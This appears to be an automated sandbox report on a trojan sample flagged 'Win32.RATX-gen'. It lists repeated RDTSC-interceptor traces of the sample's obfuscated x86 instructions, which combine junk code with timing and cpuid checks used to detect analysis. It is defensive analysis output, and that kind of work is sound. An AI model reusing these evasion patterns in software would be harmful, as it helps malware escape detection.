                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52DF76 second address: 52E073 instructions: 0x00000000 rdtsc 0x00000002 xchg di, si 0x00000005 bswap edi 0x00000007 jmp 00007F8AB0DEE927h 0x00000009 xchg ch, ah 0x0000000b mov si, word ptr [esp] 0x0000000f mov bx, 90E2h 0x00000013 mov edx, ebp 0x00000015 mov ecx, esp 0x00000017 call 00007F8AB0DEE983h 0x0000001c push dword ptr [esp+02h] 0x00000020 jmp 00007F8AB0DEE936h 0x00000022 not ch 0x00000024 lea ebx, dword ptr [ecx+000000A1h] 0x0000002a mov al, DDh 0x0000002c pop word ptr [esp+02h] 0x00000031 jmp 00007F8AB0DEE95Dh 0x00000033 mov bh, ch 0x00000035 lea esi, dword ptr [00000000h+ebx*4] 0x0000003c mov word ptr [esp+03h], si 0x00000041 mov esi, 2CA17698h 0x00000046 bswap ecx 0x00000048 push word ptr [esp+02h] 0x0000004d jmp 00007F8AB0DEE992h 0x0000004f mov dh, byte ptr [esp+02h] 0x00000053 push dword ptr [esp+06h] 0x00000057 lea esp, dword ptr [esp+0Ah] 0x0000005b xchg word ptr [esp], bp 0x0000005f xchg ax, di 0x00000061 push word ptr [esp] 0x00000065 call 00007F8AB0DEE91Fh 0x0000006a jmp 00007F8AB0DEE99Ch 0x0000006c pop word ptr [esp+01h] 0x00000071 mov byte ptr [esp+02h], bl 0x00000075 call 00007F8AB0DEE8FDh 0x0000007a bswap edi 0x0000007c xchg edi, ecx 0x0000007e mov dl, byte ptr [esp+01h] 0x00000082 xchg ebx, eax 0x00000084 jmp 00007F8AB0DEE97Ah 0x00000086 mov cx, 439Eh 0x0000008a xchg word ptr [esp+05h], bx 0x0000008f push word ptr [esp+05h] 0x00000094 call 00007F8AB0DEE9A2h 0x00000099 pop ecx 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52E68E second address: 52E69B instructions: 0x00000000 rdtsc 0x00000002 xchg word ptr [esp+03h], dx 0x00000007 xchg bl, ah 0x00000009 jmp 00007F8AB1593E64h 0x0000000b mov dl, bl 0x0000000d pop dx 0x0000000f call 00007F8AB1593E86h 0x00000014 push dword ptr [esp+03h] 0x00000018 cpuid 0x0000001a lea edx, dword ptr [00000000h+ebx*4] 0x00000021 not bx 0x00000024 jmp 00007F8AB1593EAFh 0x00000026 lea esi, dword ptr [esp+0000F8EDh] 0x0000002d xchg byte ptr [esp+0Dh], dh 0x00000031 mov edx, dword ptr [esp+0Eh] 0x00000035 cpuid 0x00000037 lea esp, dword ptr [esp+01h] 0x0000003b pushad 0x0000003c jmp 00007F8AB1593EBFh 0x0000003e pop si 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 487106 second address: 487356 instructions: 0x00000000 rdtsc 0x00000002 bsr cx, ax 0x00000006 jno 00007F8AB1593EBBh 0x00000008 jmp 00007F8AB1593EC0h 0x0000000a xchg cl, ah 0x0000000c mov ah, byte ptr [esp] 0x0000000f jmp 00007F8AB1593ECFh 0x00000011 neg esi 0x00000013 sub esp, 0Bh 0x00000016 jp 00007F8AB1593E85h 0x00000018 lea eax, dword ptr [ebx+edi] 0x0000001b jmp 00007F8AB1593F2Bh 0x00000020 not dx 0x00000023 bswap eax 0x00000025 mov cx, E141h 0x00000029 jmp 00007F8AB1593ED0h 0x0000002b add esp, 03h 0x0000002e jmp 00007F8AB1593E87h 0x00000030 lea esp, dword ptr [esp+08h] 0x00000034 neg esi 0x00000036 sub esp, 0Bh 0x00000039 jc 00007F8AB1593EB2h 0x0000003b jnc 00007F8AB1593EF4h 0x0000003d pop word ptr [esp] 0x00000041 setns cl 0x00000044 xchg dword ptr [esp+03h], eax 0x00000048 jmp 00007F8AB1593E7Fh 0x0000004a lea eax, dword ptr [ecx+esi] 0x0000004d mov cl, 09h 0x0000004f jmp 00007F8AB1593EBEh 0x00000051 mov cl, byte ptr [esp] 0x00000054 lea esp, dword ptr [esp+01h] 0x00000058 lea esp, dword ptr [esp+08h] 0x0000005c add esi, 395AD57Fh 0x00000062 cmp ax, 0000A1BFh 0x00000066 jmp 00007F8AB1593ED1h 0x00000068 jbe 00007F8AB1593F11h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 487356 second address: 4872F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 765D225Fh 0x00000007 mov ecx, FC5B28A4h 0x0000000c bsr ax, si 0x00000010 sub esi, 68829BC1h 0x00000016 mov dx, word ptr [esp] 0x0000001a jmp 00007F8AB0DEE8E6h 0x0000001c mov dh, byte ptr [esp] 0x0000001f mov al, 1Ah 0x00000021 lea ecx, dword ptr [eax+edx] 0x00000024 setb dh 0x00000027 mov eax, dword ptr [esp] 0x0000002a lea edx, dword ptr [esp+ebx] 0x0000002d jmp 00007F8AB0DEE929h 0x0000002f dec esi 0x00000030 rcr dl, 00000006h 0x00000033 jc 00007F8AB0DEE98Bh 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49799B second address: 497A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EA6h 0x00000004 lea ecx, dword ptr [ecx+edi] 0x00000007 lea edx, dword ptr [00000000h+ebx*4] 0x0000000e jmp 00007F8AB1593F85h 0x00000013 mov esi, dword ptr [ebp+00h] 0x00000016 mov ecx, edx 0x00000018 mov edx, 8EB07D69h 0x0000001d stc 0x0000001e jns 00007F8AB1593E3Fh 0x00000020 jmp 00007F8AB1593E49h 0x00000022 rcl ch, 00000000h 0x00000025 add ebp, 04h 0x00000028 bsf ax, ax 0x0000002c je 00007F8AB1593E80h 0x0000002e lea edx, dword ptr [eax+eax] 0x00000031 mov ch, bh 0x00000033 jmp 00007F8AB1593EC0h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48ADEA second address: 48AE34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE992h 0x00000004 mov ax, C344h 0x00000008 bswap eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AFA8 second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 xor cl, FFFFFFC2h 0x00000009 bsr eax, ebx 0x0000000c jmp 00007F8AB1593EF1h 0x0000000e jp 00007F8AB1593EB6h 0x00000010 mov ax, si 0x00000013 mov dx, word ptr [esp] 0x00000017 jmp 00007F8AB1593F00h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B06E second address: 48B186 instructions: 0x00000000 rdtsc 0x00000002 and eax, ebx 0x00000004 bsr edx, esp 0x00000007 jmp 00007F8AB0DEE904h 0x00000009 bswap edx 0x0000000b jmp 00007F8AB0DEE968h 0x0000000d dec cl 0x0000000f bsr dx, bp 0x00000013 jmp 00007F8AB0DEE9A2h 0x00000015 je 00007F8AB0DEE904h 0x00000017 setp al 0x0000001a mov edx, eax 0x0000001c jmp 00007F8AB0DEE902h 0x0000001e call 00007F8AB0DEE9A0h 0x00000023 mov eax, 4B8EAC0Fh 0x00000028 mov dx, di 0x0000002b adc dx, 1AB4h 0x00000030 rcr al, 00000002h 0x00000033 xchg dword ptr [esp], ebx 0x00000036 jmp 00007F8AB0DEE984h 0x00000038 lea edx, dword ptr [00000000h+ebx*4] 0x0000003f btc dx, bx 0x00000043 mov dh, 6Ch 0x00000045 mov dx, B473h 0x00000049 bts dx, sp 0x0000004d lea ebx, dword ptr [ebx+1Eh] 0x00000050 jmp 00007F8AB0DEECE1h 0x00000055 mov dl, B7h 0x00000057 lea edx, dword ptr [edx+ebx] 0x0000005a bswap edx 0x0000005c mov dx, word ptr [esp] 0x00000060 bts edx, edi 0x00000063 xchg dword ptr [esp], ebx 0x00000066 jmp 00007F8AB0DEE7BFh 0x0000006b bsr dx, sp 0x0000006f mov ax, word ptr [esp] 0x00000073 xchg ah, dh 0x00000075 mov ax, 08E7h 0x00000079 mov dx, cx 0x0000007c push dword ptr [esp] 0x0000007f retn 0004h 0x00000082 and ecx, 3Ch 0x00000085 jmp 00007F8AB0DEEA57h 0x0000008a mov al, byte ptr [esp] 0x0000008d mov eax, esi 0x0000008f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B47B second address: 48B569 instructions: 0x00000000 rdtsc 0x00000002 rcr dl, cl 0x00000004 jmp 00007F8AB1593F58h 0x00000009 inc ebp 0x0000000a sub esp, 04h 0x0000000d jl 00007F8AB1593E84h 0x0000000f mov edx, edi 0x00000011 pushfd 0x00000012 lea eax, dword ptr [00000000h+eax*4] 0x00000019 mov eax, dword ptr [esp] 0x0000001c jmp 00007F8AB1593F25h 0x00000021 neg eax 0x00000023 jmp 00007F8AB1593E21h 0x00000028 mov al, ah 0x0000002a setbe al 0x0000002d shl dx, 1 0x00000030 jl 00007F8AB1593EE3h 0x00000032 setle dh 0x00000035 bt ax, sp 0x00000039 xor cl, 0000003Eh 0x0000003c bswap eax 0x0000003e jmp 00007F8AB1593E55h 0x00000040 mov dx, 1CAEh 0x00000044 lea edx, dword ptr [00000000h+ebp*4] 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48A5A2 second address: 48A562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEEA33h 0x00000007 jmp 00007F8AB0DEE81Bh 0x0000000c ror cl, 00000000h 0x0000000f mov eax, FED2A885h 0x00000014 lea edx, dword ptr [eax+00004342h] 0x0000001a mov al, 8Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 497AC6 second address: 497BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593F01h 0x00000004 sub esi, 04h 0x00000007 mov dx, 73F9h 0x0000000b mov ax, E32Dh 0x0000000f rcl ax, cl 0x00000012 jnl 00007F8AB1593E72h 0x00000014 jmp 00007F8AB1593EDAh 0x00000016 bsr edx, esi 0x00000019 mov ecx, dword ptr [ebp+00h] 0x0000001c mov dx, bx 0x0000001f bsr ax, dx 0x00000023 jmp 00007F8AB1593F69h 0x00000028 ja 00007F8AB1593D92h 0x0000002e lea eax, dword ptr [esi+54h] 0x00000031 lea edx, dword ptr [esp+eax] 0x00000034 mov al, dh 0x00000036 bsr ax, bx 0x0000003a lea eax, dword ptr [esp+edi] 0x0000003d bswap eax 0x0000003f call 00007F8AB1593EEDh 0x00000044 sub esp, 01h 0x00000047 mov dx, ax 0x0000004a xchg byte ptr [esp], al 0x0000004d mov byte ptr [esp], bl 0x00000050 mov byte ptr [esp], al 0x00000053 jmp 00007F8AB1593ED3h 0x00000055 lea esp, dword ptr [esp+01h] 0x00000059 xchg dword ptr [esp], edi 0x0000005c neg dx 0x0000005f mov eax, esi 0x00000061 lea edx, dword ptr [FA2511AAh] 0x00000067 jmp 00007F8AB1593E78h 0x00000069 mov eax, 5C79E6DCh 0x0000006e call 00007F8AB1593EF0h 0x00000073 lea edi, dword ptr [edi+5Eh] 0x00000076 mov edx, esi 0x00000078 dec dx 0x0000007a lea edx, dword ptr [ecx-3Bh] 0x0000007d or eax, 50115FD1h 0x00000082 jmp 00007F8AB1593E79h 0x00000084 sete dh 0x00000087 xchg dword ptr [esp+04h], edi 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49928B second address: 4992AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE96Bh 0x00000004 push esi 0x00000005 mov ch, B9h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4992AB second address: 499323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov byte ptr [esp+1Ah], bh 0x00000007 jmp 00007F8AB1593EEDh 0x00000009 btr esi, esi 0x0000000c jbe 00007F8AB1593E87h 0x0000000e neg ebx 0x00000010 mov eax, dword ptr [esp] 0x00000013 jmp 00007F8AB1593EC1h 0x00000015 add esp, 20h 0x00000018 jmp 00007F8AB159487Fh 0x0000001d jns 00007F8AB15934C7h 0x00000023 pop edi 0x00000024 mov dx, di 0x00000027 lea ebx, dword ptr [00000000h+eax*4] 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A94F0 second address: 4A999D instructions: 0x00000000 rdtsc 0x00000002 not dx 0x00000005 btr eax, esi 0x00000008 jnc 00007F8AB0DEEDF0h 0x0000000e jc 00007F8AB0DEEAE6h 0x00000014 shr dh, 1 0x00000016 jmp 00007F8AB0DEEC54h 0x0000001b sub ebp, 04h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B022 second address: 48B186 instructions: 0x00000000 rdtsc 0x00000002 and eax, ebx 0x00000004 bsr edx, esp 0x00000007 bswap edx 0x00000009 jmp 00007F8AB1593EB8h 0x0000000b dec cl 0x0000000d bsr dx, bp 0x00000011 jmp 00007F8AB1593EF2h 0x00000013 je 00007F8AB1593E54h 0x00000015 setp al 0x00000018 mov edx, eax 0x0000001a jmp 00007F8AB1593E52h 0x0000001c call 00007F8AB1593EF0h 0x00000021 mov eax, 4B8EAC0Fh 0x00000026 mov dx, di 0x00000029 adc dx, 1AB4h 0x0000002e rcr al, 00000002h 0x00000031 xchg dword ptr [esp], ebx 0x00000034 jmp 00007F8AB1593ED4h 0x00000036 lea edx, dword ptr [00000000h+ebx*4] 0x0000003d btc dx, bx 0x00000041 mov dh, 6Ch 0x00000043 mov dx, B473h 0x00000047 bts dx, sp 0x0000004b lea ebx, dword ptr [ebx+1Eh] 0x0000004e jmp 00007F8AB1594231h 0x00000053 mov dl, B7h 0x00000055 lea edx, dword ptr [edx+ebx] 0x00000058 bswap edx 0x0000005a mov dx, word ptr [esp] 0x0000005e bts edx, edi 0x00000061 xchg dword ptr [esp], ebx 0x00000064 jmp 00007F8AB1593D0Fh 0x00000069 bsr dx, sp 0x0000006d mov ax, word ptr [esp] 0x00000071 xchg ah, dh 0x00000073 mov ax, 08E7h 0x00000077 mov dx, cx 0x0000007a push dword ptr [esp] 0x0000007d retn 0004h 0x00000080 and ecx, 3Ch 0x00000083 jmp 00007F8AB1593FA7h 0x00000088 mov al, byte ptr [esp] 0x0000008b mov eax, esi 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49901A second address: 499086 instructions: 0x00000000 rdtsc 0x00000002 dec dh 0x00000004 jmp 00007F8AB0DEE97Ch 0x00000006 add cl, FFFFFFA1h 0x00000009 xchg ah, al 0x0000000b bsr edx, edi 0x0000000e jnbe 00007F8AB0DEE983h 0x00000010 xchg eax, edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49B208 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 add ecx, E346A1A5h 0x00000008 push dword ptr [esp+1Ch] 0x0000000c retn 0020h 0x0000000f push esi 0x00000010 jmp 00007F8AB1593F18h 0x00000012 and edx, D81356B1h 0x00000018 jnp 00007F8AB1593F02h 0x0000001a mov dx, word ptr [esp] 0x0000001e mov ah, 72h 0x00000020 jmp 00007F8AB1593E76h 0x00000022 mov ecx, ebx 0x00000024 mov edx, 568228A5h 0x00000029 jmp 00007F8AB1593EE9h 0x0000002b mov cx, word ptr [esp] 0x0000002f pop ebp 0x00000030 lea eax, dword ptr [ebx+esi] 0x00000033 not ax 0x00000036 jmp 00007F8AB1593E71h 0x00000038 bts si, dx 0x0000003c jle 00007F8AB1593ECDh 0x0000003e mov al, cl 0x00000040 jmp 00007F8AB1593ECBh 0x00000042 pop esi 0x00000043 jmp 00007F8AB157FD52h 0x00000048 mov ebx, esi 0x0000004a mov dh, cl 0x0000004c jmp 00007F8AB1593E59h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49A712 second address: 49A6AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 not edx 0x00000005 jmp 00007F8AB0DEE911h 0x00000007 push edi 0x00000008 mov cl, byte ptr [esp] 0x0000000b lea edi, dword ptr [edi-7Bh] 0x0000000e setnle dl 0x00000011 mov edx, 58BD0688h 0x00000016 mov bl, dl 0x00000018 jmp 00007F8AB0DEE907h 0x0000001a cmc 0x0000001b jns 00007F8AB0DEE939h 0x0000001d bswap edi 0x0000001f jmp 00007F8AB0DEE985h 0x00000021 lea ecx, dword ptr [edi+3498DDEDh] 0x00000027 push esp 0x00000028 mov esi, dword ptr [esp+04h] 0x0000002c btc edx, ebx 0x0000002f jmp 00007F8AB0DEE96Ch 0x00000031 jns 00007F8AB0DEE90Ch 0x00000033 lea esp, dword ptr [esp+08h] 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 499046 second address: 499086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593F1Ah 0x00000004 dec dh 0x00000006 jmp 00007F8AB1593E26h 0x00000008 add cl, FFFFFFA1h 0x0000000b xchg ah, al 0x0000000d bsr edx, edi 0x00000010 jnbe 00007F8AB1593ED3h 0x00000012 xchg eax, edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A88E9 second address: 4A88F6 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 jmp 00007F8AB0DEE979h 0x00000006 jmp 00007F8AB0DEE929h 0x00000008 mov ebp, dword ptr [esp] 0x0000000b lea esp, dword ptr [esp+04h] 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A88F6 second address: 4A8956 instructions: 0x00000000 rdtsc 0x00000002 mov bx, word ptr [esp] 0x00000006 lea edi, dword ptr [ecx+esi] 0x00000009 call 00007F8AB1593ECFh 0x0000000e jmp 00007F8AB1593E8Ah 0x00000010 add esp, 08h 0x00000013 jle 00007F8AB1593ECBh 0x00000015 jnle 00007F8AB1593EC9h 0x00000017 pop esi 0x00000018 call 00007F8AB1593E89h 0x0000001d mov eax, ebp 0x0000001f neg bx 0x00000022 jmp 00007F8AB1593EF8h 0x00000024 jle 00007F8AB1593E5Fh 0x00000026 jnle 00007F8AB1593E5Dh 0x00000028 add esp, 04h 0x0000002b jmp 00007F8AB1593EC8h 0x0000002d jnbe 00007F8AB1593E7Eh 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A8956 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB0DEE99Fh 0x00000007 mov edx, dword ptr [esp+02h] 0x0000000b jmp 00007F8AB0DEE936h 0x0000000d add esp, 04h 0x00000010 jns 00007F8AB0DEE969h 0x00000012 pop edi 0x00000013 jmp 00007F8AB0DCD0E3h 0x00000018 mov ebx, esi 0x0000001a mov dh, cl 0x0000001c jmp 00007F8AB0DEE909h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4992C7 second address: 4992AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E7Fh 0x00000004 push esi 0x00000005 mov ch, B9h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC43 second address: 4AAC64 instructions: 0x00000000 rdtsc 0x00000002 xchg cx, dx 0x00000005 jmp 00007F8AB0DEE982h 0x00000007 mov al, dh 0x00000009 xchg dword ptr [esp], esi 0x0000000c setbe ch 0x0000000f mov ch, bl 0x00000011 lea ecx, dword ptr [ebx+54h] 0x00000014 lea esi, dword ptr [esi+27h] 0x00000017 jmp 00007F8AB0DEE92Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC64 second address: 49833F instructions: 0x00000000 rdtsc 0x00000002 xchg al, dl 0x00000004 mov dx, word ptr [esp] 0x00000008 xchg dword ptr [esp], esi 0x0000000b jmp 00007F8AB1593EBDh 0x0000000d lea eax, dword ptr [00000000h+eax*4] 0x00000014 mov dx, word ptr [esp] 0x00000018 mov ah, 97h 0x0000001a not ah 0x0000001c push dword ptr [esp] 0x0000001f retn 0004h 0x00000022 ja 00007F8AB15814F4h 0x00000028 jmp 00007F8AB1593ECDh 0x0000002a movzx ecx, byte ptr [ebp+00h] 0x0000002e sub esp, 00000000h 0x00000031 js 00007F8AB1593E6Eh 0x00000033 rcl dh, cl 0x00000035 jmp 00007F8AB1593F92h 0x0000003a sub esp, 18h 0x0000003d lea eax, dword ptr [eax+ebp] 0x00000040 bswap eax 0x00000042 jmp 00007F8AB1593E48h 0x00000044 bts eax, edx 0x00000047 jmp 00007F8AB1593DD2h 0x0000004c rcl dh, cl 0x0000004e call 00007F8AB1593F00h 0x00000053 mov eax, DD22D1A1h 0x00000058 sub esp, 0Eh 0x0000005b lea esp, dword ptr [esp+06h] 0x0000005f mov ah, dl 0x00000061 xchg eax, edx 0x00000062 jmp 00007F8AB1593ED3h 0x00000064 xchg dword ptr [esp+08h], ebp 0x00000068 bswap edx 0x0000006a mov ah, byte ptr [esp] 0x0000006d lea ebp, dword ptr [ebp+71h] 0x00000070 pushad 0x00000071 lea edx, dword ptr [475C02B4h] 0x00000077 jmp 00007F8AB1593E77h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B9816 second address: 4B97DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE911h 0x00000004 add ebp, 02h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4872E7 second address: 4872F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 765D225Fh 0x00000007 jmp 00007F8AB1593E81h 0x00000009 mov ecx, FC5B28A4h 0x0000000e bsr ax, si 0x00000012 jmp 00007F8AB1593F2Eh 0x00000017 sub esi, 68829BC1h 0x0000001d mov dx, word ptr [esp] 0x00000021 jmp 00007F8AB1593E36h 0x00000023 mov dh, byte ptr [esp] 0x00000026 mov al, 1Ah 0x00000028 lea ecx, dword ptr [eax+edx] 0x0000002b setb dh 0x0000002e mov eax, dword ptr [esp] 0x00000031 lea edx, dword ptr [esp+ebx] 0x00000034 jmp 00007F8AB1593E79h 0x00000036 dec esi 0x00000037 rcr dl, 00000006h 0x0000003a jc 00007F8AB1593EDBh 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1379 second address: 4B1387 instructions: 0x00000000 rdtsc 0x00000002 neg edx 0x00000004 js 00007F8AB0DEE936h 0x00000006 call 00007F8AB0DEE98Ch 0x0000000b mov ecx, EEB6F27Eh 0x00000010 mov ecx, dword ptr [ebp+00h] 0x00000013 jmp 00007F8AB0DEE92Ah 0x00000015 mov ax, word ptr [esp] 0x00000019 mov eax, edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B8CBF second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB1593EA6h 0x00000007 mov byte ptr [esp+01h], dl 0x0000000b clc 0x0000000c jmp 00007F8AB1593ED7h 0x0000000e jnl 00007F8AB1593E6Fh 0x00000010 sub esi, 08h 0x00000013 jmp 00007F8AB1593EB8h 0x00000015 xchg edx, ecx 0x00000017 call 00007F8AB1593ED5h 0x0000001c lea esp, dword ptr [esp+01h] 0x00000020 push word ptr [esp] 0x00000024 js 00007F8AB1593E7Bh 0x00000026 jns 00007F8AB1593EC0h 0x00000028 sub esp, 1Ah 0x0000002b lea esp, dword ptr [esp+03h] 0x0000002f jmp 00007F8AB1593E59h 0x00000031 mov dword ptr [esi], ecx 0x00000033 mov cl, ch 0x00000035 jmp 00007F8AB1593EBEh 0x00000037 lea ecx, dword ptr [00000000h+edi*4] 0x0000003e call 00007F8AB1593ED6h 0x00000043 mov byte ptr [esp+01h], dh 0x00000047 mov dword ptr [esi+04h], eax 0x0000004a mov ah, 76h 0x0000004c sub esp, 13h 0x0000004f jmp 00007F8AB1593EA6h 0x00000051 jnbe 00007F8AB1593E78h 0x00000053 xchg byte ptr [esp+0Dh], ch 0x00000057 call 00007F8AB1593FA9h 0x0000005c lea esp, dword ptr [esp+03h] 0x00000060 jmp 00007F8AB1585C4Ah 0x00000065 pushad 0x00000066 push word ptr [esp+06h] 0x0000006b jbe 00007F8AB1593E78h 0x0000006d lea esp, dword ptr [esp+02h] 0x00000071 jmp 00007F8AB1593E7Ch 0x00000073 lea edx, dword ptr [edi+50h] 0x00000076 xchg eax, ecx 0x00000077 mov eax, dword ptr [esp] 0x0000007a stc 0x0000007b jle 00007F8AB1593ED4h 0x0000007d jnle 00007F8AB1593EBCh 0x0000007f cmp esi, edx 0x00000081 call 00007F8AB1593EB6h 0x00000086 lea ecx, dword ptr [00000000h+edx*4] 0x0000008d mov cx, 4E80h 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A94F0 second address: 4A999D instructions: 0x00000000 rdtsc 0x00000002 not dx 0x00000005 btr eax, esi 0x00000008 jnc 00007F8AB0DEEDF0h 0x0000000e shr dh, 1 0x00000010 sub ebp, 04h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49B208 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 add ecx, E346A1A5h 0x00000008 push dword ptr [esp+1Ch] 0x0000000c retn 0020h 0x0000000f push esi 0x00000010 jmp 00007F8AB1593F18h 0x00000012 and edx, D81356B1h 0x00000018 jnp 00007F8AB1593F02h 0x0000001a mov dx, word ptr [esp] 0x0000001e mov ah, 72h 0x00000020 mov ecx, ebx 0x00000022 jmp 00007F8AB1593EE2h 0x00000024 mov edx, 568228A5h 0x00000029 mov cx, word ptr [esp] 0x0000002d jmp 00007F8AB1593EDDh 0x0000002f pop ebp 0x00000030 lea eax, dword ptr [ebx+esi] 0x00000033 not ax 0x00000036 jmp 00007F8AB1593E71h 0x00000038 bts si, dx 0x0000003c jle 00007F8AB1593ECDh 0x0000003e mov al, cl 0x00000040 jmp 00007F8AB1593ECBh 0x00000042 pop esi 0x00000043 jmp 00007F8AB157FD52h 0x00000048 mov ebx, esi 0x0000004a mov dh, cl 0x0000004c jmp 00007F8AB1593E59h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1091 second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 rcl edx, cl 0x00000004 jmp 00007F8AB0DEE9AFh 0x00000006 jne 00007F8AB0DEE8F7h 0x00000008 mov ax, ss 0x0000000a lea edx, dword ptr [00000000h+eax*4] 0x00000011 push eax 0x00000012 jmp 00007F8AB0DEE4C3h 0x00000017 pop ss 0x00000018 pushfd 0x00000019 jmp 00007F8AB0DEEE06h 0x0000001e pop dword ptr [esi] 0x00000020 mov ecx, dword ptr [esp] 0x00000023 bt edx, ecx 0x00000026 jmp 00007F8AB0DEE986h 0x00000028 jp 00007F8AB0DEE920h 0x0000002a call 00007F8AB0DEE96Ah 0x0000002f jmp 00007F8AB0DE846Ah 0x00000034 pushad 0x00000035 push word ptr [esp+06h] 0x0000003a jbe 00007F8AB0DEE928h 0x0000003c lea esp, dword ptr [esp+02h] 0x00000040 jmp 00007F8AB0DEE92Ch 0x00000042 lea edx, dword ptr [edi+50h] 0x00000045 xchg eax, ecx 0x00000046 mov eax, dword ptr [esp] 0x00000049 stc 0x0000004a jle 00007F8AB0DEE984h 0x0000004c jnle 00007F8AB0DEE96Ch 0x0000004e cmp esi, edx 0x00000050 call 00007F8AB0DEE966h 0x00000055 lea ecx, dword ptr [00000000h+edx*4] 0x0000005c mov cx, 4E80h 0x00000060 rdtsc
